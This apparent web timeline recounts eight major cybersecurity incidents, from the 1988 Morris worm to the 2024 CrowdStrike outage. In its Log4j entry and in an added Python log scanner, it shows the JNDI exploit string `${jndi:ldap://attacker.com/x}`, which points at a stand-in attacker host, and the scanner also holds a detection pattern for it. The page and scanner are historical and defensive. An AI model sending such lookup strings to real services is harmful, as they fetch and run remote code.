8 events
A History of Cybersecurity
1980s
1 event
Image credit: Trevor Blackwell (Wikimedia Commons), CC BY-SA 3.0 / GFDL
On the night of 2 November 1988 a worm released by Cornell graduate student Robert Tappan Morris chained vulnerabilities in sendmail, fingerd, and rsh to self-replicate across the early Internet, infecting an estimated 6,000 of roughly 60,000 hosts — around 10% of the network. A miscalibrated replication rate meant a single host could run many copies of the worm at once; the resulting load made infected machines unusable, effectively halting the network. In 1989 Morris became the first person prosecuted under the 1986 Computer Fraud and Abuse Act (CFAA), and he was convicted in 1990. The incident led DARPA to fund the creation of the CERT Coordination Center, founding the discipline of computer-security incident response.
2010s
4 events
Image credit: Hamed Saber (Wikimedia Commons), CC BY 2.0
In June 2010 analysts at VirusBlokAda, a Belarusian anti-virus vendor, found unusual malware on an Iranian customer's systems; joint analysis by Symantec, Kaspersky, and Ralph Langner's team then exposed the full picture. Stuxnet combined four zero-day exploits, device drivers signed with certificates stolen from Realtek and JMicron, and deep knowledge of Windows and the Siemens Step7/WinCC PLC toolchain to physically damage uranium-enrichment centrifuges at Iran's Natanz facility. Widely attributed to a joint US NSA / Israeli Unit 8200 operation codenamed Olympic Games, it is estimated to have destroyed about 1,000 IR-1 centrifuges. As the first known instance of a state using malware to cause physical destruction, it fundamentally redefined what cyber warfare means.

Image credit: Gage Skidmore (Wikimedia Commons), CC BY-SA 2.0
On 5 June 2013 *The Guardian* published Glenn Greenwald's story revealing NSA bulk collection of Verizon call metadata. On 6 June *The Guardian* and *The Washington Post* simultaneously broke PRISM — a program collecting user data directly from Google, Facebook, Apple and others. The source, soon visible on video from a Hong Kong hotel, was **Edward Snowden**, a 29-year-old NSA contractor at Booz Allen Hamilton. Over the following months more than 200,000 documents would surface, exposing XKeyscore, Bullrun (the campaign against encryption), MUSCULAR (taps on the fibre links between Google and Yahoo data centres), GCHQ's Tempora, and the interception of allied heads of state's communications. Snowden fled via Hong Kong to Moscow, where as of 2026 he still lives. The disclosures set off a global privacy debate, drove mainstream adoption of end-to-end encryption (Signal, WhatsApp) and the HTTPS Everywhere push, and fed the broader critique of surveillance capitalism.
Image credit: Leena Kurjenniska / Codenomicon (Wikimedia Commons), CC0 1.0
On 7 April 2014 a buffer-over-read vulnerability in OpenSSL's TLS heartbeat extension — **CVE-2014-0160**, branded **Heartbleed** — was disclosed. Found independently and nearly simultaneously by Codenomicon and Google Security's Neel Mehta, it let an attacker read up to 64 KB of a server's process memory per malformed heartbeat request, repeatable at will, leaking private keys, session cookies, and user passwords. The bug had shipped in OpenSSL 1.0.1 in March 2012 and remained undetected and unpatched for two years. With Apache and nginx then serving more than two-thirds of the web, most of the public Internet was within scope. Heartbleed exposed the structural fragility of having critical open-source software maintained by tiny, unpaid teams; it led to the Linux Foundation's **Core Infrastructure Initiative** (later OpenSSF), to OpenBSD's **LibreSSL** fork, and to Google's **BoringSSL**.

Image credit: Sntruisi (Wikimedia Commons), public domain (US)
On 12 May 2017 the WannaCry ransomware encrypted an estimated 300,000 Windows machines in 150 countries. Its propagation engine was **EternalBlue**, an NSA exploit for the SMBv1 flaw MS17-010 / CVE-2017-0144, which had been dumped by the **Shadow Brokers** on 14 April 2017. Microsoft had released a patch on 14 March 2017, but vast numbers of unpatched hosts remained worldwide. Britain's National Health Service was hit hard: hospitals diverted ambulances and cancelled scheduled surgery. About seven hours into the outbreak, 22-year-old British researcher **Marcus Hutchins (MalwareTech)** found and registered a kill-switch domain (`iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com`) embedded in the code, which the malware checked before spreading, halting the outbreak. The US and UK governments later formally attributed the attack to North Korea's **Lazarus Group**.
2020s
3 events
Image credit: Orthopedicshoes / SolarWinds (Wikimedia Commons), CC BY 4.0
On 13 December 2020 the security firm **FireEye** (later Mandiant) and Microsoft disclosed that Russia's **SVR** foreign-intelligence service — known to Western agencies as APT29 / Cozy Bear, later "Midnight Blizzard" — had implanted the **SUNBURST** backdoor into the legitimate build pipeline of **SolarWinds Orion**, a widely deployed network-management product. Trojaned Orion updates (versions 2019.4 HF5 through 2020.2.1) were distributed between March and June 2020 and downloaded by **about 18,000 organisations**. A smaller cluster of several hundred organisations was then selected for deeper intrusion, including **nine US federal agencies** (Treasury, DHS, State, Justice, Commerce, Energy, NIH, NTIA, and others) and major vendors such as Microsoft, Cisco, FireEye, and Mimecast. The case is also notable because FireEye discovered the campaign on its own network — a top-tier security company that the attackers had tried, and failed, to use as a stepping stone. It remains the canonical large-scale software supply-chain attack.
Image credit: Apache Software Foundation / Jim McKeeth (Wikimedia Commons), Apache License 2.0 / CC0 1.0
On 24 November 2021 Chen Zhaojun of Alibaba Cloud's security team reported a remote-code-execution vulnerability in the JNDI lookup feature of Apache Log4j 2.x — later **CVE-2021-44228**, CVSS 10.0 — to the Apache Software Foundation. On 9 December a proof-of-concept leaked on Twitter and the ASF released the emergency patch (Log4j 2.15.0). The exploit was trivially simple: any attacker-controlled string of the form `${jndi:ldap://attacker.com/x}` that reached a log statement would make the server resolve the JNDI reference, fetch Java bytecode from the attacker's server and execute it. The first widely shared demonstration used the in-game chat of Minecraft (Java Edition) to hijack other players' servers. The blast radius was on the order of billions of machines: Log4j is the de-facto standard logger of the Java ecosystem, embedded in Apache projects, Twitter, Apple iCloud, Steam, Tencent QQ, Amazon, IBM, Oracle, and virtually every other major Java stack. The White House convened an emergency open-source security summit and accelerated SBOM mandates; CISA ordered US federal agencies into unprecedented end-of-year remediation.
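A defender-side illustration of the mechanism described above, added here as an example and not part of the original page or of the Log4j project: a small Python scanner that flags log lines containing a JNDI lookup string of the plain `${jndi:<scheme>:...}` form shown, records the line number and the scheme, and tallies hits for triage. The log lines are constructed for the demonstration; the `attacker.com` host is the page's own placeholder.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample web-server log lines for this example (not real traffic).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:01:02:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:01:02:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.com/x}"',
    '10.0.0.7 - - [10/Dec/2021:01:02:05 +0000] "GET /?q=${JNDI:rmi://attacker.com/a} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

# Matches the plain lookup form from the page, "${jndi:<scheme>:", case-insensitively,
# tolerating stray whitespace around the separators.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def find_jndi_lookups(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, lowercase scheme, matched text) for every JNDI lookup found."""
    hits: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(lines, start=1):
        for match in JNDI_LOOKUP.finditer(line):
            hits.append((lineno, match.group(1).lower(), match.group(0)))
    return hits


def summarise_by_scheme(hits: List[Tuple[int, str, str]]) -> Dict[str, int]:
    """Count hits per JNDI scheme (ldap, rmi, dns, ...) so responders can prioritise."""
    counts: Dict[str, int] = {}
    for _, scheme, _ in hits:
        counts[scheme] = counts.get(scheme, 0) + 1
    return counts


if __name__ == "__main__":
    found = find_jndi_lookups(SAMPLE_LOG_LINES)
    for lineno, scheme, text in found:
        print(f"line {lineno}: {scheme} lookup {text!r}")
    print(summarise_by_scheme(found))
```

This only answers the question "did such strings reach our logs?"; the fix the page describes is upgrading to the patched Log4j release. The pattern deliberately covers just the literal form quoted on the page, so a match is high-confidence while a clean result is not proof of absence.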

Image credit: Smishra1 (Wikimedia Commons), CC BY-SA 4.0
On 19 July 2024 a faulty update file (Channel File 291) distributed to the cybersecurity firm CrowdStrike's Falcon Sensor sent an estimated 8.5 million Windows machines worldwide into a blue-screen boot loop. Airline operations (Delta cancelled about 7,000 flights, with reported losses of US$500 million), hospitals, bank ATMs, emergency response systems, and broadcasters went down simultaneously. Total estimated economic loss exceeded US$10 billion, the largest of any single IT outage. Recovery required a manual boot into Safe Mode on each affected machine; many organisations needed days to weeks. The incident exposed, at global scale, the supply-chain risk of SaaS security products and the weakness of software validation processes.
Related organizations: Microsoft Corporation
Appears in: A General History of Information Technology · A History of Cloud Computing